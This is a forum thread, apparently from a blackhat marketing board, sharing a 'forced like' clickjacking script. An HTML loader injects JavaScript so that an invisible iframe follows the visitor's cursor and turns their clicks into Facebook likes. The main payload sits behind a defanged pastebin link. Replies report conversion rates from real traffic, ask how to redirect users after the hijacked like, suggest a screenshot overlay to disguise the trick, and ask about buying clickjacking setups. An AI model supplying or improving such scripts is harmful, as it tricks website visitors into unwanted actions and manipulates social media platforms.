[GET] Basic Forced Like / Clickjacking script

Humble

Registered Member
Joined
Jul 17, 2010
Messages
80
Reaction score
52
Script below creates a iframe like box that follows your cursor. The iframe is invisible and requires the user to click somewhere.

Paste these codes into 2 separate files (one html, one js)

index.html
PHP:
<script language="javascript">  window.onload = function(){ var s = document.createElement('script'); s.src = 'jscript.js'; document.getElementsByTagName('body')[0].appendChild(s); }   </script> <body> Click anywhere </body>
jscript.js
PHP:
hxxp://pastebin.pom/kemeguVf
Credits goes out to Eric Kerr for original javascript.

PS: After a while your page gets blacklisted by facebook

Rename hxxp and .pom to correct terms.
 
This script does not work perfect.
I had about 5000 UV & got only 500 likes.
 
It requires users to click somewhere on the page and also requires users to be logged into facebook.
 
This is very Blackhat. I like it, but I don't have enough traffic to use it. ATM, I am trying to use facebook to get traffic.
 
Just tested it in local and woks great!
Thanks for sharing this.
 
how can you make it redirect after the user like the page
 
Yeah!.

Is there anyway to make a redirect to index2 after user have liked the fan page?

Thanks in advance.
 
must try this out later. What happens when they try to click a link on your website does it just keep clicking the like button?
 
how much are people charging for a clickjacking set up?? i am interested in getting some click jacking likes??
 
It's easy to redirect people after they have clicked. Just make a screenshot of your website lay out, use the screenshot as a lay out instead and use <a href=""> </a> to send them to a website when they click.
 
Are you sure your logged in? After a while your webpage gets blocked, is your page blocked?
 
can anyone sent me here link for download of hiden like button after a image? (when you click in image you will be automaticly fan ?) :( does anyone ? thnx...
 
Back
Top